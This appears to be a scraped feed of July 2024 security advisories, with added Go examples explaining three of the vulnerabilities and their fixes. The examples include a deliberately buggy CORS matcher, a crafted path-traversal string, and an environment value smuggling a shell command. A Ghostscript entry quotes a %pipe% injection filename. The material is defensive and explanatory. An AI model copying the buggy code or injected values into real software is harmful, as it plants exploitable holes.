airvertco frappejs v0.0.11 was discovered to contain a prototype pollution vulnerability via the function registerView. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GC7M-596H-X57R

02.07.2024 00:30:36 | npm | [NPM:GHSA-GH4X-QV3P-M9PM] akbr patch-into was discovered to contain a prototype pollution via the function patchInto (moderate)
akbr patch-into v1.0.1 was discovered to contain a prototype pollution vulnerability via the function patchInto. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GH4X-QV3P-M9PM

01.07.2024 12:06:31 | ubuntu | [USN-6859-1] OpenSSH vulnerability (high)
OpenSSH could be made to bypass authentication and remotely access systems without proper credentials.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6859-1

01.07.2024 07:21:23 | ubuntu | [USN-6858-1] eSpeak NG vulnerabilities (medium)
Several security issues were fixed in eSpeak NG.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6858-1

01.07.2024 03:00:00 | archlinux | [ASA-202407-1] openssh: authentication bypass (high)
https://secdb.nttzen.cloud/security-advisory/archlinux/ASA-202407-1

01.07.2024 03:00:00 | debian | [DSA-5724-1] openssh (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5724-1

01.07.2024 03:00:00 | freebsd | [FREEBSD:F1A00122-3797-11EF-B611-84A93843EB75] OpenSSH -- Race condition resulting in potential remote code execution (high)
The OpenSSH project reports: A race condition in sshd(8) could allow remote code execution as root on non-OpenBSD systems.
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:F1A00122-3797-11EF-B611-84A93843EB75

01.07.2024 03:00:00 | gentoo | [GLSA-202407-04] Pixman: Heap Buffer Overflow (normal)
A vulnerability has been discovered in Pixman, which can lead to a heap buffer overflow.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-04

01.07.2024 03:00:00 | gentoo | [GLSA-202407-01] Zsh: Prompt Expansion Vulnerability (normal)
A vulnerability has been discovered in Zsh, which can lead to execution of arbitrary code.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-01

01.07.2024 03:00:00 | gentoo | [GLSA-202407-02] SDL_ttf: Arbitrary Memory Write (normal)
A vulnerability has been discovered in SDL_ttf, which can lead to arbitrary memory writes.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-02

01.07.2024 03:00:00 | gentoo | [GLSA-202407-03] Liferea: Remote Code Execution (normal)
A vulnerability has been discovered in Liferea, which can lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-03

01.07.2024 03:00:00 | gentoo | [GLSA-202407-05] SSSD: Command Injection (normal)
A vulnerability has been discovered in SSSD, which can lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-05

01.07.2024 03:00:00 | gentoo | [GLSA-202407-06] cryptography: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in cryptography, the worst of which could lead to a denial of service.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-06

01.07.2024 03:00:00 | gentoo | [GLSA-202407-07] cpio: Arbitrary Code Execution (normal)
A vulnerability has been discovered in cpio, which can lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-07

01.07.2024 03:00:00 | gentoo | [GLSA-202407-08] GNU Emacs, Org Mode: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been discovered in GNU Emacs and Org Mode, the worst of which could lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-08

01.07.2024 03:00:00 | gentoo | [GLSA-202407-09] OpenSSH: Remote Code Execution (high)
A vulnerability has been discovered in OpenSSH, which can lead to remote code execution with root privileges.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-09

01.07.2024 03:00:00 | oraclelinux | [ELSA-2024-12468] openssh security update (important)
[8.7p1-38.0.2]
- Restore dropped earlier ifdef condition for safe _exit(1) call in sshsigdie() [Orabug: 36783468] Resolves CVE-2024-6387
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12468

01.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4197] httpd:2.4/httpd security update (moderate)
httpd
[2.4.37-65.0.1]
- Replace index.html with Oracle's index page oracle_index.html
[2.4.37-65]
- Resolves: RHEL-31857 - httpd:2.4/httpd: HTTP response splitting (CVE-2023-38709)
mod_http2
mod_md
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4197

01.07.2024 03:00:00 | redhat | [RHSA-2024:4197] httpd:2.4/httpd security update (moderate)
The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.

Security Fix(es):

* httpd:2.4: httpd: HTTP response splitting (CVE-2023-38709)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4197

01.07.2024 19:16:25 | maven | [MAVEN:GHSA-CF3Q-VG8W-MW84] Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation (moderate)
Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism. This allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account. This issue affects Apache StreamPipes: from 0.69.0 through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CF3Q-VG8W-MW84

30.06.2024 03:00:00 | freebsd | [FREEBSD:C742DBE8-3704-11EF-9E6E-B42E991FC52E] netatalk3 -- Multiple vulnerabilities
cve@mitre.org reports: This entry documents the following three vulnerabilities:

Netatalk before 3.2.1 has an off-by-one error and resultant heap-based buffer overflow because of setting ibuf[len] to '\0' in FPMapName in afp_mapname in etc/afpd/directory.c. 2.4.1 and 3.1.19 are also fixed versions.

Netatalk before 3.2.1 has an off-by-one error, and resultant heap-based buffer overflow and segmentation violation, because of incorrectly using FPLoginExt in BN_bin2bn in etc/uams/uams_dhx_pam.c. The original issue 1097 report stated: 'The latest version of Netatalk (v3.2.0) contains a security vulnerability. This vulnerability arises due to a lack of validation for the length field after parsing user-provided data, leading to an out-of-bounds heap write of one byte (\0). Under specific configurations, this can result in reading metadata of the next heap block, potentially causing a Denial of Service (DoS) under certain heap layouts or with ASAN enabled. ...

Netatalk before 3.2.1 has an off-by-one error and resultant heap-based buffer overflow because of setting ibuf[PASSWDLEN] to '\0' in FPLoginExt in login in etc/uams/uams_pam.c. 2.4.1 and 3.1.19 are also fixed versions.
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:C742DBE8-3704-11EF-9E6E-B42E991FC52E

02.07.2024 22:59:20 | go | [GO-2024-2963] Denial of service due to improper 100-continue handling in net/http
The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail.

An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2963

02.07.2024 22:50:00 | cisco | [CISCO-SA-OPENSSH-RCE-2024] Remote Unauthenticated Code Execution Vulnerability in OpenSSH Server (regreSSHion): July 2024 (high)
On July 1, 2024, the Qualys Threat Research Unit (TRU) disclosed an unauthenticated, remote code execution vulnerability that affects the OpenSSH server (sshd) in glibc-based Linux systems.

CVE-2024-6387: A signal handler race condition was found in sshd: if a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), the sshd SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example syslog().

For a description of this vulnerability, see the Qualys Security Advisory: https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt

This advisory will be updated as additional information becomes available.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-OPENSSH-RCE-2024

02.07.2024 22:38:48 | slackware | [SSA:2024-184-01] httpd
New httpd packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/httpd-2.4.60-i586-2_slack15.0.txz: Rebuilt.
  This update is to fix a regression and to note security issues that
  were not listed in the CHANGES file included with the source code.
  Fixed a regression where a config file using AddType rather than
  AddHandler could cause raw PHP files to be downloaded rather than
  processed. Thanks to Nobby6.
  For more information, see:
    https://downloads.apache.org/httpd/CHANGES_2.4.60
    https://www.cve.org/CVERecord?id=CVE-2024-39573
    https://www.cve.org/CVERecord?id=CVE-2024-38477
    https://www.cve.org/CVERecord?id=CVE-2024-38476
    https://www.cve.org/CVERecord?id=CVE-2024-38475
    https://www.cve.org/CVERecord?id=CVE-2024-38474
    https://www.cve.org/CVERecord?id=CVE-2024-38473
    https://www.cve.org/CVERecord?id=CVE-2024-38472
    https://www.cve.org/CVERecord?id=CVE-2024-36387
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/httpd-2.4.60-i586-2_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/httpd-2.4.60-x86_64-2_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.60-i586-2.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.60-x86_64-2.txz

**MD5 signatures**

Slackware 15.0 package:
5f7180a311268d3249d7ae426caa04d5  httpd-2.4.60-i586-2_slack15.0.txz

Slackware x86_64 15.0 package:
c98b552d4a9532e071663814d81695c4  httpd-2.4.60-x86_64-2_slack15.0.txz

Slackware -current package:
148986bd904948f5208e56cc7fba415b  n/httpd-2.4.60-i586-2.txz

Slackware x86_64 -current package:
d20a1b2e0183b8c47b6cde7fd1a2e24a  n/httpd-2.4.60-x86_64-2.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg httpd-2.4.60-i586-2_slack15.0.txz`

Then, restart Apache httpd:
`# /etc/rc.d/rc.httpd stop`
`# /etc/rc.d/rc.httpd start`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-184-01

02.07.2024 20:29:08 | go | [GO-2024-2951] Denial of service when syncing with a malicious peer in github.com/cometbft/cometbft
A malicious peer can cause a syncing node to panic during blocksync. The syncing node may enter into a catastrophic invalid syncing state or get stuck in blocksync mode, never switching to consensus. Nodes that are vulnerable to this state may experience a Denial of Service condition in which syncing will not work as expected when joining a network as a client.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2951

02.07.2024 20:15:04 | alpinelinux | [ALPINE:CVE-2023-39324] go vulnerability
[From CVE-2023-39324] Rejected reason: reserved but not needed
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-39324

02.07.2024 20:12:06 | go | [GO-2024-2955] Gin mishandles a wildcard in the origin string in github.com/gin-contrib/cors
Gin-Gonic CORS middleware mishandles a wildcard at the end of an origin string. Examples: https://example.community/* is accepted by the origin string https://example.com/*, and http://localhost.example.com/* is accepted by the origin string http://localhost/*.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2955

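The GO-2024-2955 entry above gives the symptom but not the mechanism. The following is an added example written for this page in Go, not gin-contrib/cors's own code: it reconstructs the class of bug that produces exactly the advisory's examples, a trailing `*` handled by slicing the pattern at `i-1` instead of `i`, which also drops the `/` before the star, so `https://example.com/*` degrades to the prefix `https://example.com` and `http://localhost/*` to `http://localhost`. `parseRule`, `OriginAllowed` and the `buggy` switch are this example's own names; the origin strings are the ones quoted in the advisory.

```go
package main

// Added example, not gin-contrib/cors's own code: a reconstruction of the
// wildcard-origin matching described in GO-2024-2955. parseRule(buggy=true)
// reproduces the off-by-one that explains the advisory's examples (a trailing
// '*' handled as pattern[:i-1], dropping the character before the star too);
// buggy=false is the corrected split.

import (
	"errors"
	"fmt"
	"strings"
)

// rule is an allowed-origin pattern split around its single '*'.
type rule struct{ prefix, suffix string }

func (r rule) match(origin string) bool {
	return len(origin) >= len(r.prefix)+len(r.suffix) &&
		strings.HasPrefix(origin, r.prefix) &&
		strings.HasSuffix(origin, r.suffix)
}

// parseRule splits pattern at its '*'. "https://example.com/*" must become
// prefix "https://example.com/"; the buggy branch yields "https://example.com",
// which is also a prefix of "https://example.community".
func parseRule(pattern string, buggy bool) (rule, error) {
	if strings.Count(pattern, "*") != 1 {
		return rule{}, errors.New("pattern must contain exactly one '*'")
	}
	i := strings.Index(pattern, "*")
	if buggy && i > 0 && i == len(pattern)-1 {
		return rule{prefix: pattern[:i-1]}, nil
	}
	return rule{prefix: pattern[:i], suffix: pattern[i+1:]}, nil
}

// OriginAllowed reports whether a request's Origin header value matches any
// configured pattern; patterns without '*' must match exactly.
func OriginAllowed(origin string, patterns []string, buggy bool) bool {
	for _, p := range patterns {
		if !strings.Contains(p, "*") {
			if origin == p {
				return true
			}
			continue
		}
		r, err := parseRule(p, buggy)
		if err == nil && r.match(origin) {
			return true
		}
	}
	return false
}

func main() {
	patterns := []string{"https://example.com/*", "http://localhost/*"}
	for _, origin := range []string{"https://example.community", "http://localhost.example.com", "https://example.com/app"} {
		fmt.Printf("%-30s buggy=%-5v fixed=%v\n", origin,
			OriginAllowed(origin, patterns, true), OriginAllowed(origin, patterns, false))
	}
}
```

Two practitioner caveats that the corrected split does not remove: a browser sends `Origin` as `scheme://host[:port]` with no path, so a pattern whose fixed part ends in `/` is only ever matched by a path-bearing origin, and any wildcard pattern still admits every origin sharing its literal prefix. Prefer an explicit list of exact origins; if a wildcard is unavoidable, put the `*` only where the variable part is (for example a subdomain label) and make sure the literal part ends at a delimiter such as `.` or `:`.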
02.07.2024 20:05:05 | go | [GO-2024-2961] Limited directory traversal vulnerability on Windows in golang.org/x/crypto
httpTokenCacheKey uses path.Base to extract the expected HTTP-01 token value to look up in the DirCache implementation. On Windows, path.Base acts differently to filepath.Base, since Windows uses a different path separator (\ vs. /), allowing a user to provide a relative path, i.e. .well-known/acme-challenge/..\..\asd becomes ..\..\asd. The extracted path is then suffixed with +http-01, joined with the cache directory, and opened.

Since the controlled path is suffixed with +http-01 before opening, the impact of this is significantly limited, since it only allows reading arbitrary files on the system if and only if they have this suffix.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2961

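The entry above describes a cache key derived with `path.Base`; the following added example (written for this page, not golang.org/x/crypto's own code) shows what `path.Base` leaves in the key for the advisory's crafted path and one alternative that never lets a separator of either kind reach the file system layer: validate the token against the base64url alphabet that RFC 8555 section 8.3 prescribes for http-01 challenge tokens. `NaiveTokenKey`, `SafeTokenKey` and the allowlist approach are this example's own; the Windows-specific difference between `path.Base` and `filepath.Base` cannot be reproduced on Linux, but the backslashes surviving `path.Base` are visible on any OS.

```go
package main

// Added example, not golang.org/x/crypto's own code: NaiveTokenKey mirrors the
// pattern GO-2024-2961 describes (path.Base on the request path, then a
// "+http-01" suffix); SafeTokenKey validates the token against the base64url
// alphabet RFC 8555 prescribes for challenge tokens before building any key.

import (
	"errors"
	"fmt"
	"path"
	"regexp"
	"strings"
)

const challengePrefix = "/.well-known/acme-challenge/"

// tokenRe is the base64url alphabet without padding (RFC 8555 section 8.3).
var tokenRe = regexp.MustCompile(`^[A-Za-z0-9_-]+$`)

// NaiveTokenKey takes the last '/'-separated element of the URL path and adds
// the suffix. path.Base never treats '\' as a separator, so on Windows the
// backslashes in the result become directory separators when the key is opened.
func NaiveTokenKey(urlPath string) string {
	return path.Base(urlPath) + "+http-01"
}

// SafeTokenKey requires the fixed challenge prefix and a token drawn only from
// the allowed alphabet; anything else is rejected before a cache lookup.
func SafeTokenKey(urlPath string) (string, error) {
	if !strings.HasPrefix(urlPath, challengePrefix) {
		return "", errors.New("not an http-01 challenge path")
	}
	token := strings.TrimPrefix(urlPath, challengePrefix)
	if !tokenRe.MatchString(token) {
		return "", errors.New("invalid http-01 token")
	}
	return token + "+http-01", nil
}

func main() {
	crafted := `/.well-known/acme-challenge/..\..\asd` // path quoted in the advisory
	fmt.Printf("naive key: %q\n", NaiveTokenKey(crafted))
	if _, err := SafeTokenKey(crafted); err != nil {
		fmt.Println("safe key :", err)
	}
}
```

Allowlisting the token alphabet is stricter than normalising separators: `..`, `/`, `\`, `%` and NUL are all outside the alphabet, so the check holds on every platform regardless of which `Base` function is used afterwards.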
02.07.2024 20:05:05 | go | [GO-2024-2962] Output of "go env" does not sanitize values in cmd/go
Command go env is documented as outputting a shell script containing the Go environment. However, go env doesn't sanitize values, so executing its output as a shell script can cause various bad behaviors, including executing arbitrary commands or inserting new environment variables.

This issue is relatively minor because, in general, if an attacker can set arbitrary environment variables on a system, they have better attack vectors than making "go env" print them out.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2962

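The entry above is about the general problem of printing environment values into a script that will later be `eval`'d. The following added example (written for this page in Go, not cmd/go's own code) renders a constructed environment both as bare `KEY=value` lines and as single-quoted assignments; the `'\''` idiom is the POSIX way to embed a single quote, and a single-quoted string is the only shell quoting form in which nothing is expanded. `ShellQuote`, `RenderEnvScript` and the `GOFLAGS` value carrying a command are this example's own.

```go
package main

// Added example, not cmd/go's own code: the difference between printing
// environment variables as bare KEY=value lines and as single-quoted shell
// assignments, using a constructed value that carries shell syntax.

import (
	"fmt"
	"sort"
	"strings"
)

// ShellQuote wraps s in single quotes; any single quote inside becomes '\''
// (close the string, add a literal quote, reopen). A POSIX shell reads the
// result back as the original bytes with no expansion of $, `, ; or newlines.
func ShellQuote(s string) string {
	return "'" + strings.ReplaceAll(s, "'", `'\''`) + "'"
}

// RenderEnvScript emits one assignment per variable in key order. quote=false
// reproduces the unsanitised form the advisory describes: eval'ing that output
// runs whatever follows a ';' or sits inside $( ) in a value.
func RenderEnvScript(vars map[string]string, quote bool) string {
	keys := make([]string, 0, len(vars))
	for k := range vars {
		keys = append(keys, k)
	}
	sort.Strings(keys)
	var b strings.Builder
	for _, k := range keys {
		v := vars[k]
		if quote {
			v = ShellQuote(v)
		}
		fmt.Fprintf(&b, "%s=%s\n", k, v)
	}
	return b.String()
}

func main() {
	// Constructed hostile value: a GOFLAGS setting with a command appended.
	vars := map[string]string{
		"GOFLAGS": "-mod=mod; touch /tmp/pwned",
		"GOPATH":  "/home/dev/go",
	}
	fmt.Print("unsafe:\n", RenderEnvScript(vars, false))
	fmt.Print("quoted:\n", RenderEnvScript(vars, true))
}
```

Quoting the value is necessary but the variable name needs a check too: a name containing `=`, whitespace or `;` would break the assignment regardless of how the value is quoted, so a renderer that accepts names from an untrusted source should reject anything outside `[A-Za-z_][A-Za-z0-9_]*` (not shown here).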
02.07.2024 18:59:43 | go | [GO-2024-2519] Grafana world readable configuration files in github.com/grafana/grafana (medium)
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2519

02.07.2024 18:44:11 | go | [GO-2024-2567] Panic in Pipeline when PgConn is busy or closed in github.com/jackc/pgx
Pipeline can panic when PgConn is busy or closed.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2567

02.07.2024 18:35:39 | go | [GO-2024-2883] Denial of service via malicious preflight requests in github.com/rs/cors
The middleware causes a prohibitive amount of heap allocations when processing malicious preflight requests that include an Access-Control-Request-Headers (ACRH) header whose value contains many commas. This behavior can be abused by attackers to produce undue load on the middleware/server as an attempt to cause a denial of service.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2883

02.07.2024 18:20:34 | go | [GO-2024-2958] Potential memory exhaustion attack due to sparse slice deserialization in github.com/gorilla/schema (high)
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2958

02.07.2024 18:20:34 | go | [GO-2024-2959] Session Middleware Token Injection Vulnerability in github.com/gofiber/fiber (critical)
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2959

02.07.2024 17:15:13 | alpinelinux | [ALPINE:CVE-2024-38519] yt-dlp vulnerability (high)
[From CVE-2024-38519] `yt-dlp` is a command-line audio/video downloader. Prior to version 2024.07.01, `yt-dlp` does not limit the extensions of downloaded files, which could lead to arbitrary filenames being created in the download folder (and path traversal on Windows). Since `yt-dlp` also reads config from the working directory (and on Windows executables will be executed from the yt-dlp directory) this could lead to arbitrary code being executed. `yt-dlp` version 2024.07.01 fixes this issue by whitelisting the allowed extensions. This might mean some very uncommon extensions might not get downloaded, however it will also limit the possible exploitation surface. In addition to upgrading, have `.%(ext)s` at the end of the output template and make sure the user trusts the websites that they are downloading from. Also, make sure to never download to a directory within PATH or other sensitive locations like one's user directory, `system32`, or other binaries locations. For users who are not able to upgrade, keep the default output template (`-o "%(title)s [%(id)s].%(ext)s"`); make sure the extension of the media to download is a common video/audio/sub/... one; try to avoid the generic extractor; and/or use `--ignore-config --config-location ...` to not load config from common locations.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38519

02.07.2024 17:13:09 | rockylinux | [RLSA-2024:3954] firefox security update (important)
An update is available for firefox. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list.
https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:3954

02.07.2024 17:13:09 | rockylinux | [RLSA-2024:3961] flatpak security update (important)
An update is available for flatpak. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list.
https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:3961

02.07.2024 17:13:09 | rockylinux | [RLSA-2024:4000] ghostscript security update (important)
An update is available for ghostscript. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list.
https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4000

02.07.2024 17:13:09 | rockylinux | [RLSA-2024:4036] thunderbird security update (important)
An update is available for thunderbird. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list.
https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4036

02.07.2024 17:13:09 | rockylinux | [RLSA-2024:4084] git security update (important)
An update is available for git. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list.
https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4084

02.07.2024 16:44:50 | ubuntu | [USN-6860-1] OpenVPN vulnerabilities
Several security issues were fixed in OpenVPN.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6860-1

03.07.2024 00:23:42 | almalinux | [ALSA-2024:4212] golang security update (moderate)
golang security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4212

02.07.2024 18:12:02 | almalinux | [ALSA-2024:4211] kernel security and bug fix update (important)
kernel security and bug fix update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4211

04.07.2024 00:26:05 | slackware | [SSA:2024-185-02] httpd
New httpd packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/httpd-2.4.61-i586-1_slack15.0.txz: Upgraded.
  This update contains the fix for the 2.4.60 regression, which has also
  been assigned a CVE. We fixed this already, but we'll make it official.
  For more information, see:
    https://downloads.apache.org/httpd/CHANGES_2.4
    https://www.cve.org/CVERecord?id=CVE-2024-39884
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/httpd-2.4.61-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/httpd-2.4.61-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.61-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.61-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
6382c01b1d266e87996b63a9898a98df  httpd-2.4.61-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
b9df01c7110b3948901e980ac67936c2  httpd-2.4.61-x86_64-1_slack15.0.txz

Slackware -current package:
e3ed6307309d9d6d568aa9a70ee98cbd  n/httpd-2.4.61-i586-1.txz

Slackware x86_64 -current package:
f6e9a6faf7447f052c50e15893be88ed  n/httpd-2.4.61-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg httpd-2.4.61-i586-1_slack15.0.txz`

Then, restart Apache httpd:
`# /etc/rc.d/rc.httpd stop`
`# /etc/rc.d/rc.httpd start`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-185-02

03.07.2024 22:15:03 | alpinelinux | [ALPINE:CVE-2024-29510] ghostscript vulnerability
[From CVE-2024-29510] Artifex Ghostscript before 10.03.1 allows memory corruption, and SAFER sandbox bypass, via format string injection with a uniprint device.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-29510

03.07.2024 22:15:03 | alpinelinux | [ALPINE:CVE-2024-33869] ghostscript vulnerability
[From CVE-2024-33869] An issue was discovered in Artifex Ghostscript before 10.03.1. Path traversal and command execution can occur (via a crafted PostScript document) because of path reduction in base/gpmisc.c. For example, restrictions on use of %pipe% can be bypassed via the aa/../%pipe%command# output filename.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-33869

03.07.2024 22:15:03 | alpinelinux | [ALPINE:CVE-2024-33870] ghostscript vulnerability
[From CVE-2024-33870] An issue was discovered in Artifex Ghostscript before 10.03.1. There is path traversal (via a crafted PostScript document) to arbitrary files if the current directory is in the permitted paths. For example, there can be a transformation of ../../foo to ./../../foo and this will grant access if ./ is permitted.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-33870

03.07.2024 22:15:03 | alpinelinux | [ALPINE:CVE-2024-33871] ghostscript vulnerability
[From CVE-2024-33871] An issue was discovered in Artifex Ghostscript before 10.03.1. contrib/opvp/gdevopvp.c allows arbitrary code execution via a custom Driver library, exploitable via a crafted PostScript document. This occurs because the Driver parameter for opvp (and oprp) devices can have an arbitrary name for a dynamic library; this library is then loaded.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-33871

03.07.2024 21:55:17slackware[SSA:2024-185-01] netatalk (critical)New netatalk packages are available for Slackware 15.0 and -current to fix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/netatalk-3.2.1-i586-1_slack15.0.txz: Upgraded. Shared library .so-version bump. Fixed security issues that could lead to a denial of service or the execution of arbitrary code. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-38439 https://www.cve.org/CVERecord?id=CVE-2024-38440 https://www.cve.org/CVERecord?id=CVE-2024-38441 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/netatalk-3.2.1-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/netatalk-3.2.1-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/netatalk-3.2.1-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/netatalk-3.2.1-x86_64-1.txz**MD5 signatures**Slackware 15.0 package:fc31b84f5813cccdc0c8860f5d53e241 netatalk-3.2.1-i586-1_slack15.0.txzSlackware x86_64 15.0 package:0d14cc40ed92e7047ce90874ffd46bd9 netatalk-3.2.1-x86_64-1_slack15.0.txzSlackware -current package:b15d5cc0696c21ed1b202d588a0bfedf n/netatalk-3.2.1-i586-1.txzSlackware x86_64 -current package:4d63ba62283559c020182e7db9d0f6e1 n/netatalk-3.2.1-x86_64-1.txz**Installation instructions**Upgrade the package as root:`# upgradepkg netatalk-3.2.1-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-185-01
03.07.2024 18:41:43go[GO-2024-2965] Pomerium exposed OAuth2 access and ID tokens in user info endpoint response in github.com/pomerium/pomerium (medium)https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2965
03.07.2024 08:46:30ubuntu[USN-6862-1] Firefox vulnerabilities (high)Several security issues were fixed in Firefox.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6862-1
03.07.2024 03:00:00debian[DSA-5725-1] znc security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5725-1
